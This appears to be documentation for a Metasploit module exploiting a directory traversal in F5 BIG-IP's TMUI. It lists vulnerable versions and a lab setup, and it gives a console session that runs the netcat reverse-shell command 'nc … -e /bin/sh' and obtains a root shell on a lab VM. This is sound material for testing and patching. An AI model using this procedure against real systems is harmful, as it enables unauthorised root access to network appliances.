William Vu
3.8 KiB
3.8 KiB
Vulnerable Application
Description
This module exploits a directory traversal in F5's BIG-IP Traffic Management User Interface (TMUI) to upload a shell script and execute it as the root user.
Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2, 15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.
Tested on the VMware OVA release of 14.1.2.
Setup
Download BIGIP-14.1.2-0.0.37.ALL-scsi.ova and import it into your desired virtualization software.
Verification Steps
Targets
0
This executes a Unix command.
1
This uses a Linux dropper to execute code.
Options
WritableDir
Set this to a writable directory in which files will be dropped.
Defaults to /tmp.
Scenarios
F5 BIG-IP 14.1.2 in VMware Fusion
msf5 > use exploit/linux/http/f5_bigip_tmui_rce
[*] Using configured payload cmd/unix/reverse_netcat_gaping
msf5 exploit(linux/http/f5_bigip_tmui_rce) > options
Module options (exploit/linux/http/f5_bigip_tmui_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat_gaping):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix Command
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.163.145
rhosts => 172.16.163.145
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.163.1
lhost => 172.16.163.1
msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
[+] nc 172.16.163.1 4444 -e /bin/sh
[*] Started reverse TCP handler on 172.16.163.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
[*] Creating alias list=bash
[+] Successfully created alias list=bash
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
[*] Executing command: nc 172.16.163.1 4444 -e /bin/sh
[*] Uploading /tmp/VaU9ShHKR9vSa4U2q87Tio
[+] Successfully uploaded /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Executing /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Command shell session 1 opened (172.16.163.1:4444 -> 172.16.163.145:39434) at 2020-07-07 12:11:02 -0500
[+] Deleted /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
uname -a
Linux localhost.localdomain 3.10.0-514.26.2.el7.ve.x86_64 #1 SMP Wed Aug 7 08:16:38 PDT 2019 x86_64 x86_64 x86_64 GNU/Linux